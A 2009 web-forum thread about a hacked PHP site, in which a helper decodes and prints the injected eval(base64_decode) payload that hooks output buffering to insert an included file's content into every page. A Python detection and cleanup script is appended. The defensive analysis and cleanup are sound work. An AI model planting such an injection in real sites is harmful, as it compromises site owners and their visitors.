phpfan101 Posted December 16, 2009

<?php /**/eval(base64_decode('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')); ?>

Can anyone help me find out what this means???? It's appearing on all of my pages, I have no clue what it is.
oni-kun Posted December 16, 2009

> <?php /**/eval(base64_decode('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')); ?>
> Can anyone help me find out what this means???? It's appearing on all of my pages, I have no clue what it is.

It's base64, an almost sad form of obfuscation, but here's the decoded result:

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){
    // run once per request, guarded by a global flag
    $GLOBALS['sh_no']=1;
    if(file_exists('/home/socrime/public_html/t2/sandbox/backup-8.6.2008_20-15-20_socrime/homedir/public_html/phptesting/x7chat2/docs/install.dragonfly/x7chat/style.css.php')){
        // the included file is expected to define gml(), which produces the content to inject
        include_once('/home/socrime/public_html/t2/sandbox/backup-8.6.2008_20-15-20_socrime/homedir/public_html/phptesting/x7chat2/docs/install.dragonfly/x7chat/style.css.php');
        if(function_exists('gml')&&!function_exists('dgobh')){
            if(!function_exists('gzdecode')){
                // polyfill for PHP < 5.4: skip the gzip header, then inflate the body
                function gzdecode($d){
                    $f=ord(substr($d,3,1));   // FLG byte of the gzip header
                    $h=10;                    // fixed header length
                    $e=0;
                    if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}  // FEXTRA
                    if($f&8){$h=strpos($d,chr(0),$h)+1;}                          // FNAME (NUL-terminated)
                    if($f&16){$h=strpos($d,chr(0),$h)+1;}                         // FCOMMENT (NUL-terminated)
                    if($f&2){$h+=2;}                                              // FHCRC
                    $u=gzinflate(substr($d,$h));
                    if($u===FALSE){$u=$d;}    // not gzip after all: pass the buffer through untouched
                    return $u;
                }
            }
            // output-buffer callback: injects gml() right after the opening <body> tag,
            // or in front of the whole page if there is no <body> tag
            function dgobh($b){
                Header('Content-Encoding: none');
                $c=gzdecode($b);
                if(preg_match('/\<body/si',$c)){
                    return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);
                }else{
                    return gml().$c;
                }
            }
            ob_start('dgobh');
        }
    }
}

There's no lines since the base64 encoding stripped them.

EDIT: 'socrime', is that your username? May be an XSS attack if it were appearing on your pages for no reason.. 'install.dragonfly', not sure what Dragonfly is.
phpfan101 Posted December 16, 2009 (Author)

But how is it affecting me? ... And how did it get there?
oni-kun Posted December 16, 2009

> But how is it affecting me? ... And how did it get there?

It looks like it's attempting to replace your 'body' tags with some sort of chat? Or program of some sort. I believe it is a hacking attempt, as it has a stupidly simple obfuscation technique. Change your passwords, especially FTP/your site account's. And remove it from every file you have.

EDIT: Dragonfly looks like it's a CMS, do you use this? It may have been autogenerated if you're using some sort of content generator.. But I'm not sure why it would be encoded, I still think it's not supposed to be there.
phpfan101 Posted December 16, 2009 (Author)

lol, all 983? I see a fun night coming up!
oni-kun Posted December 16, 2009

> lol, all 983? I see a fun night coming up!

Wow, man, that must suck.. I'd recommend using some sort of batch text replacer, shouldn't be too hard to FTP them off site and use one, I've found some online. If the codes are the same (should be) you can simply replace them all in one go. But yeah, change your passwords! Good luck.
phpfan101 Posted December 16, 2009 (Author)

But when they're gone, my content isn't showing??? How do I fix that? And I have never heard of Dragonfly, no.
oni-kun Posted December 16, 2009

> But when they're gone, my content isn't showing??? How do I fix that? And I have never heard of Dragonfly, no.

Uh oh.. Are there any other files on your server such as .htaccess that have entries you did not include? SOMETHING may have been further modified to prevent you from removing their code. Look in your PHP file that doesn't work without it, for example: is that the only thing changed? I'd look online with some of that code.. You can re-decode the base64 here if you wish: http://www.motobit.com/util/base64-decoder-encoder.asp?charset=iso-8859-1&acharset= There may be an entry somewhere online describing the type of attack and how to remove it.
phpfan101 Posted December 16, 2009 (Author)

.htaccess:

AuthName "test"
AuthUserFile "/home/socrime/.htpasswds/public_html/2/passwd"

That's all of it... should I delete it?
oni-kun Posted December 16, 2009

> .htaccess:
> AuthName "test"
> AuthUserFile "/home/socrime/.htpasswds/public_html/2/passwd"
> That's all of it... should I delete it?

I just need to know, is your hosting username 'socrime' or similar? But yes, if you did not create that then you should delete it. From the looks of it, it's hiding the directories of domain.com/2/..
phpfan101 Posted December 16, 2009 (Author)

Yeah, that's my hosting name, and no, I didn't create it.
oni-kun Posted December 16, 2009

> Yeah, that's my hosting name, and no, I didn't create it.

You may want to delete the folder named '2' on your root. This may be an entry the person has created to get back into your site or something.
phpfan101 Posted December 16, 2009 (Author)

Done... pages where I deleted the base64 decode... still not working though.
oni-kun Posted December 16, 2009

> Done... pages where I deleted the base64 decode... still not working though.

Maybe upload and show me a full page, such as your index. Maybe something was changed; I could spot it if it's in the .php file itself. If it isn't, then php.ini or so may have been modified.
phpfan101 Posted December 16, 2009 (Author)

I'm positive it hasn't been further modified (the page I found it on). I did notice some "core.33134" files appeared, I think they're encoded though. About 10 files actually, all "core.(some number)".
oni-kun Posted December 17, 2009

> I'm positive it hasn't been further modified (the page I found it on). I did notice some "core.33134" files appeared, I think they're encoded though. About 10 files actually, all "core.(some number)".

There are some threads with somewhat helpful info here..
http://forums.oscommerce.com/index.php?showtopic=344262
http://forums.oscommerce.com/topic/344272-did-someone-hack-my-site-eval-base64-decode/

But yeah, from the look of it, and the nature of PHP being open source, you're messed without a backup or a lot of time..
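The "batch text replacer" suggested earlier in the thread, written out as a small triage and clean-up script. This is an added example, not code from the thread or from either poster: it finds every file under a web root that starts with the `<?php /**/eval(base64_decode('...')); ?>` prefix, decodes each payload and reports the facts a responder wants first (which file it includes, which output-buffer callback it registers, which suspicious calls it contains), strips the prefix while keeping a `.bak` copy, and also lists `core.<number>` files, which under Linux are the default name for process crash dumps rather than encoded payloads. The web root, the `/var/www/example/style.css.php` include path, the `dgobh` look-alike payload and the `core.33134` file in the demo are all constructed here for the example; the real base64 blob from the thread is not reproduced.

```python
"""Added example (not code from this thread): triage and clean-up helper for the
<?php /**/eval(base64_decode('...')); ?> prefix discussed above. Every path,
payload and file name below is constructed for the demo."""
import base64
import binascii
import os
import re
import tempfile
from typing import Dict, List, Tuple

# The injected prefix as it appeared in the thread, with the base64 blob captured.
INJECT_RE = re.compile(
    r"<\?php\s*/\*\*/\s*eval\(\s*base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*;\s*\?>"
)
# Same match plus at most one trailing newline, so removal leaves no blank first line.
STRIP_RE = re.compile(INJECT_RE.pattern + r"(?:\r?\n)?")
INCLUDE_RE = re.compile(r"\binclude(?:_once)?\s*\(\s*'([^']+)'\s*\)")
OB_START_RE = re.compile(r"\bob_start\s*\(\s*'(\w+)'\s*\)")
CORE_DUMP_RE = re.compile(r"^core\.\d+$")  # Linux default core-file name: core.<pid>
INDICATORS = ("ob_start", "include", "Header(", "gzdecode", "preg_replace", "$GLOBALS")
WEB_EXTENSIONS = (".php", ".phtml", ".inc", ".html", ".htm")


def decode_payload(b64: str) -> str:
    """Decode the base64 argument; raise ValueError if it is not valid base64 text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"payload is not decodable base64 text: {exc}") from exc


def summarize_payload(code: str) -> Dict[str, object]:
    """What the payload includes, which output-buffer callback it registers, and which
    suspicious calls it contains."""
    ob = OB_START_RE.search(code)
    return {
        "include_paths": INCLUDE_RE.findall(code),
        "ob_callback": ob.group(1) if ob else None,
        "indicators": [i for i in INDICATORS if i in code],
    }


def find_injections(content: str) -> List[Dict[str, object]]:
    """Locate every injected prefix in one file's text and decode it for triage."""
    findings: List[Dict[str, object]] = []
    for m in INJECT_RE.finditer(content):
        try:
            code = decode_payload(m.group(1))
        except ValueError as exc:
            findings.append({"offset": m.start(), "error": str(exc)})
            continue
        summary = summarize_payload(code)
        summary.update(offset=m.start(), decoded=code)
        findings.append(summary)
    return findings


def strip_injections(content: str) -> Tuple[str, int]:
    """Remove every injected prefix; returns (cleaned_text, number_removed)."""
    return STRIP_RE.subn("", content)


def _read(path: str) -> str:
    # surrogateescape round-trips arbitrary bytes, so rewriting never corrupts non-UTF-8 files
    with open(path, encoding="utf-8", errors="surrogateescape") as fh:
        return fh.read()


def scan_tree(root: str) -> Dict[str, List[Dict[str, object]]]:
    """Walk a web root; map relative path -> findings for every infected web file."""
    report: Dict[str, List[Dict[str, object]]] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(WEB_EXTENSIONS):
                path = os.path.join(dirpath, name)
                findings = find_injections(_read(path))
                if findings:
                    report[os.path.relpath(path, root)] = findings
    return report


def find_core_dumps(root: str) -> List[str]:
    """core.<number> files are crash dumps, not payloads, but they do not belong in a web root."""
    return sorted(
        os.path.relpath(os.path.join(d, n), root)
        for d, _, names in os.walk(root) for n in names if CORE_DUMP_RE.match(n)
    )


def clean_tree(root: str) -> Dict[str, int]:
    """Strip the prefix from every infected file in place, keeping a .bak copy of the original."""
    cleaned: Dict[str, int] = {}
    for rel in scan_tree(root):
        path = os.path.join(root, rel)
        original = _read(path)
        new_text, count = strip_injections(original)
        if count:
            with open(path + ".bak", "w", encoding="utf-8", errors="surrogateescape") as fh:
                fh.write(original)
            with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                fh.write(new_text)
            cleaned[rel] = count
    return cleaned


# Constructed look-alike of the thread's decoded blob: same shape, harmless contents.
SAMPLE_PAYLOAD = ("if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;"
                  "include_once('/var/www/example/style.css.php');ob_start('dgobh');}")
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
ORIGINAL_PAGE = "<?php\necho 'original page';\n"
INFECTED_PAGE = f"<?php /**/eval(base64_decode('{SAMPLE_B64}')); ?>\n" + ORIGINAL_PAGE


def demo() -> Dict[str, object]:
    """Throwaway web root: two infected files, one clean file, one core dump; scan, clean, rescan."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "inc"))
        for rel, text in (("index.php", INFECTED_PAGE), ("inc/footer.php", INFECTED_PAGE),
                          ("about.php", ORIGINAL_PAGE), ("core.33134", "\x7fELF")):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(text)
        before = scan_tree(root)
        result = {
            "infected_before": sorted(before),
            "first_finding": before["index.php"][0],
            "core_dumps": find_core_dumps(root),
            "cleaned": clean_tree(root),
            "infected_after": sorted(scan_tree(root)),
            "index_after": _read(os.path.join(root, "index.php")),
        }
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Run it against a copy of the site pulled down over FTP rather than the live tree, read the `decoded` and `include_paths` fields before trusting the clean-up, and keep the `.bak` files until the pages render again; the script only removes the `eval(base64_decode(...))` line it can match and decode, so any file where the injection was altered, or where something else was changed as the later posts in this thread suspect, will still show up in the rescan or still misbehave and has to be inspected by hand.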